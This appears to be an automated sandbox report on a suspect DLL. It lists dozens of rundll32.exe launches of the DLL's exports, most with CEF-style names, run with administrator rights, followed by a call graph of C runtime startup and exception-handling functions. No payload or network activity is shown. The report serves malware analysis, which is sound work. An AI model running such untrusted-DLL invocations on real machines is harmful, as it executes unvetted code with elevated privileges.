                                    Target ID:3
                                    Start time:00:21:57
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:00:21:57
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:00:22:00
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:00:22:03
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:11
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:12
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:14
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:00:22:06
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:26
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:00:22:07
                                    Start date:27/12/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta
                                    Imagebase:0xc80000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:0.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.8%
                                      Total number of Nodes:831
                                      Total number of Limit Nodes:8
                                      execution_graph 10651 6e33c469 10654 6e341372 10651->10654 10655 6e33e6a9 __getptd 66 API calls 10654->10655 10657 6e34137f 10655->10657 10656 6e3413c3 10661 6e33c48f 10656->10661 10662 6e34085b 10656->10662 10657->10656 10658 6e3413e6 10657->10658 10657->10661 10658->10661 10672 6e340fe0 10658->10672 10663 6e340867 __mtinitlocknum 10662->10663 10664 6e33e6a9 __getptd 66 API calls 10663->10664 10669 6e340887 __CallSettingFrame@12 10664->10669 10665 6e3408f8 10717 6e34091d 10665->10717 10669->10665 10711 6e33f4f1 10669->10711 10670 6e34090e __mtinitlocknum 10670->10661 10671 6e33f4f1 IsInExceptionSpec 69 API calls 10671->10670 10673 6e340fff 10672->10673 10674 6e33f4f1 IsInExceptionSpec 69 API calls 10673->10674 10678 6e341019 10673->10678 10674->10678 10675 6e34133a 10677 6e33e6a9 __getptd 66 API calls 10675->10677 10676 6e341321 10763 6e340ed9 10676->10763 10683 6e341342 10677->10683 10681 6e33e6a9 __getptd 66 API calls 10678->10681 10708 6e3410f8 FindHandler type_info::operator== ___TypeMatch 10678->10708 10679 6e33f4a5 IsInExceptionSpec 68 API calls 10679->10708 10684 6e341060 10681->10684 10682 6e341350 10682->10661 10683->10682 10685 6e33f4f1 IsInExceptionSpec 69 API calls 10683->10685 10684->10682 10687 6e33e6a9 __getptd 66 API calls 10684->10687 10685->10682 10689 6e341072 10687->10689 10690 6e33e6a9 __getptd 66 API calls 10689->10690 10693 6e341080 FindHandler 10690->10693 10691 6e33c1c7 __CxxThrowException@8 RaiseException 10691->10708 10692 6e3409fa IsInExceptionSpec 69 API calls 10692->10708 10694 6e33f4f1 IsInExceptionSpec 69 API calls 10693->10694 10698 6e34109c 10693->10698 10694->10698 10695 6e3410c6 10697 6e33e6a9 __getptd 66 API calls 10695->10697 10696 6e33e6a9 66 API calls __getptd 10696->10708 10699 6e3410cb 10697->10699 10698->10695 10701 6e33f4f1 IsInExceptionSpec 69 API calls 10698->10701 10702 6e33e6a9 __getptd 66 API calls 10699->10702 10699->10708 10701->10695 10703 6e3410dd 10702->10703 10704 6e33e6a9 __getptd 66 API calls 10703->10704 10705 6e3410e8 10704->10705 10723 6e3409fa 10705->10723 10708->10675 10708->10676 10708->10679 10708->10691 10708->10692 10708->10696 10709 6e34085b ___FrameUnwindToState 69 API calls 10708->10709 10729 6e33acff 10708->10729 10732 6e33c648 10708->10732 10738 6e340e6b 10708->10738 10748 6e33c415 RtlUnwind 10708->10748 10749 6e340a75 10708->10749 10709->10708 10722 6e33f130 10711->10722 10713 6e33f4fd DecodePointer 10714 6e33f50d 10713->10714 10715 6e33f4a5 IsInExceptionSpec 68 API calls 10714->10715 10716 6e33f528 10715->10716 10718 6e33e6a9 __getptd 66 API calls 10717->10718 10719 6e340922 10718->10719 10720 6e340904 10719->10720 10721 6e33e6a9 __getptd 66 API calls 10719->10721 10720->10670 10720->10671 10721->10720 10722->10713 10724 6e340a06 10723->10724 10728 6e340a10 ___TypeMatch 10723->10728 10725 6e33f4f1 IsInExceptionSpec 69 API calls 10724->10725 10726 6e340a0b 10725->10726 10727 6e33f4a5 IsInExceptionSpec 68 API calls 10726->10727 10727->10728 10728->10708 10730 6e33aca1 std::exception::_Copy_str 66 API calls 10729->10730 10731 6e33ad1f 10730->10731 10731->10708 10737 6e33c661 10732->10737 10733 6e33c695 10734 6e33c6ae 10733->10734 10735 6e33f4f1 IsInExceptionSpec 69 API calls 10733->10735 10734->10708 10735->10734 10736 6e33f4f1 IsInExceptionSpec 69 API calls 10736->10737 10737->10733 10737->10736 10739 6e340e83 10738->10739 10740 6e340e76 10738->10740 10783 6e33c415 RtlUnwind 10739->10783 10779 6e340dd9 10740->10779 10743 6e340e9a 10744 6e34085b ___FrameUnwindToState 69 API calls 10743->10744 10745 6e340ea8 10744->10745 10784 6e340abe 10745->10784 10747 6e340ec9 FindHandlerForForeignException 10747->10708 10748->10708 10750 6e340a81 __EH_prolog3_catch 10749->10750 10751 6e33e6a9 __getptd 66 API calls 10750->10751 10752 6e340a86 10751->10752 10753 6e340a94 10752->10753 10755 6e33f4f1 IsInExceptionSpec 69 API calls 10752->10755 10827 6e33f4de 10753->10827 10755->10753 10764 6e340ef1 10763->10764 10773 6e340fdb 10763->10773 10765 6e33e6a9 __getptd 66 API calls 10764->10765 10766 6e340ef7 10765->10766 10768 6e33e6a9 __getptd 66 API calls 10766->10768 10777 6e340f3c 10766->10777 10767 6e340f55 10770 6e33c648 _GetRangeOfTrysToCheck 69 API calls 10767->10770 10771 6e340f05 10768->10771 10769 6e33f4f1 IsInExceptionSpec 69 API calls 10769->10767 10776 6e340f6a 10770->10776 10830 6e33e4f9 EncodePointer 10771->10830 10773->10675 10774 6e340f10 10774->10777 10831 6e33c4d2 10774->10831 10776->10773 10778 6e340e6b FindHandlerForForeignException 70 API calls 10776->10778 10777->10767 10777->10769 10777->10773 10778->10776 10780 6e340de5 __mtinitlocknum 10779->10780 10798 6e340c5a 10780->10798 10782 6e340e14 ___BuildCatchObject __mtinitlocknum ___BuildCatchObjectHelper 10782->10739 10783->10743 10785 6e340aca __mtinitlocknum 10784->10785 10802 6e33c6bb 10785->10802 10788 6e33e6a9 __getptd 66 API calls 10789 6e340af5 10788->10789 10790 6e33e6a9 __getptd 66 API calls 10789->10790 10791 6e340b03 10790->10791 10792 6e33e6a9 __getptd 66 API calls 10791->10792 10793 6e340b11 10792->10793 10794 6e33e6a9 __getptd 66 API calls 10793->10794 10795 6e340b1c _CallCatchBlock2 10794->10795 10807 6e340be4 10795->10807 10797 6e340bd0 __mtinitlocknum 10797->10747 10800 6e340c66 FindHandler __mtinitlocknum 10798->10800 10799 6e33f4f1 IsInExceptionSpec 69 API calls 10801 6e340cd3 __mtinitlocknum _memmove ___BuildCatchObjectHelper 10799->10801 10800->10799 10800->10801 10801->10782 10803 6e33e6a9 __getptd 66 API calls 10802->10803 10804 6e33c6ce 10803->10804 10805 6e33e6a9 __getptd 66 API calls 10804->10805 10806 6e33c6dc 10805->10806 10806->10788 10816 6e33c70e 10807->10816 10810 6e33e6a9 __getptd 66 API calls 10811 6e340bf8 10810->10811 10812 6e33e6a9 __getptd 66 API calls 10811->10812 10814 6e340c06 10812->10814 10813 6e340c49 FindHandler 10813->10797 10814->10813 10824 6e33c6e7 10814->10824 10817 6e33e6a9 __getptd 66 API calls 10816->10817 10818 6e33c719 10817->10818 10819 6e33c735 10818->10819 10820 6e33c724 10818->10820 10821 6e33e6a9 __getptd 66 API calls 10819->10821 10822 6e33e6a9 __getptd 66 API calls 10820->10822 10823 6e33c729 10821->10823 10822->10823 10823->10810 10825 6e33e6a9 __getptd 66 API calls 10824->10825 10826 6e33c6f1 10825->10826 10826->10813 10828 6e33e6a9 __getptd 66 API calls 10827->10828 10829 6e33f4e3 10828->10829 10830->10774 10832 6e33c4f6 10831->10832 10833 6e33c4e4 10831->10833 10834 6e33e6a9 __getptd 66 API calls 10832->10834 10833->10777 10834->10833 9549 6e33c1a4 9550 6e33c1b4 9549->9550 9551 6e33c1af 9549->9551 9555 6e33c0ae 9550->9555 9563 6e34054c 9551->9563 9554 6e33c1c2 9556 6e33c0ba __mtinitlocknum 9555->9556 9560 6e33c107 ___DllMainCRTStartup 9556->9560 9561 6e33c157 __mtinitlocknum 9556->9561 9567 6e33bf4a 9556->9567 9558 6e33c137 9559 6e33bf4a __CRT_INIT@12 149 API calls 9558->9559 9558->9561 9559->9561 9560->9558 9560->9561 9562 6e33bf4a __CRT_INIT@12 149 API calls 9560->9562 9561->9554 9562->9558 9564 6e340571 9563->9564 9565 6e34057e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 9563->9565 9564->9565 9566 6e340575 9564->9566 9565->9566 9566->9550 9568 6e33bf56 __mtinitlocknum 9567->9568 9569 6e33bfd8 9568->9569 9570 6e33bf5e 9568->9570 9572 6e33c039 9569->9572 9573 6e33bfde 9569->9573 9620 6e33ec28 HeapCreate 9570->9620 9574 6e33c097 9572->9574 9575 6e33c03e 9572->9575 9578 6e33bffc 9573->9578 9585 6e33bf67 __mtinitlocknum 9573->9585 9721 6e33b97b 9573->9721 9574->9585 9757 6e33e7f2 9574->9757 9729 6e33e50b TlsGetValue 9575->9729 9576 6e33bf63 9576->9585 9621 6e33e860 GetModuleHandleW 9576->9621 9579 6e33c010 9578->9579 9586 6e33ffc7 __ioterm 67 API calls 9578->9586 9725 6e33c023 9579->9725 9584 6e33bf73 __RTC_Initialize 9589 6e33bf77 9584->9589 9596 6e33bf83 GetCommandLineA 9584->9596 9585->9560 9590 6e33c006 9586->9590 9672 6e33ec46 HeapDestroy 9589->9672 9594 6e33e53f __mtterm 70 API calls 9590->9594 9592 6e33c05b DecodePointer 9597 6e33c070 9592->9597 9595 6e33c00b 9594->9595 9724 6e33ec46 HeapDestroy 9595->9724 9646 6e34034b GetEnvironmentStringsW 9596->9646 9600 6e33c074 9597->9600 9601 6e33c08b 9597->9601 9738 6e33e57c 9600->9738 9751 6e33b131 9601->9751 9606 6e33c07b GetCurrentThreadId 9606->9585 9608 6e33bfa1 9673 6e33e53f 9608->9673 9609 6e33bfa8 9683 6e340290 9609->9683 9618 6e33bfc1 9619 6e33bfc6 9618->9619 9716 6e33ffc7 9618->9716 9619->9585 9620->9576 9622 6e33e874 9621->9622 9623 6e33e87d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9621->9623 9624 6e33e53f __mtterm 70 API calls 9622->9624 9629 6e33e8c7 TlsAlloc 9623->9629 9626 6e33e879 9624->9626 9626->9584 9627 6e33e9d6 9627->9584 9628 6e33e915 TlsSetValue 9628->9627 9630 6e33e926 9628->9630 9629->9627 9629->9628 9768 6e33b721 9630->9768 9635 6e33e9d1 9637 6e33e53f __mtterm 70 API calls 9635->9637 9636 6e33e96e DecodePointer 9638 6e33e983 9636->9638 9637->9627 9638->9635 9639 6e33fce8 __calloc_crt 66 API calls 9638->9639 9640 6e33e999 9639->9640 9640->9635 9641 6e33e9a1 DecodePointer 9640->9641 9642 6e33e9b2 9641->9642 9642->9635 9643 6e33e9b6 9642->9643 9644 6e33e57c __getptd_noexit 66 API calls 9643->9644 9645 6e33e9be GetCurrentThreadId 9644->9645 9645->9627 9647 6e340367 WideCharToMultiByte 9646->9647 9652 6e33bf93 9646->9652 9649 6e3403d4 FreeEnvironmentStringsW 9647->9649 9650 6e34039c 9647->9650 9649->9652 9779 6e33fca3 9650->9779 9659 6e33fd82 GetStartupInfoW 9652->9659 9654 6e3403aa 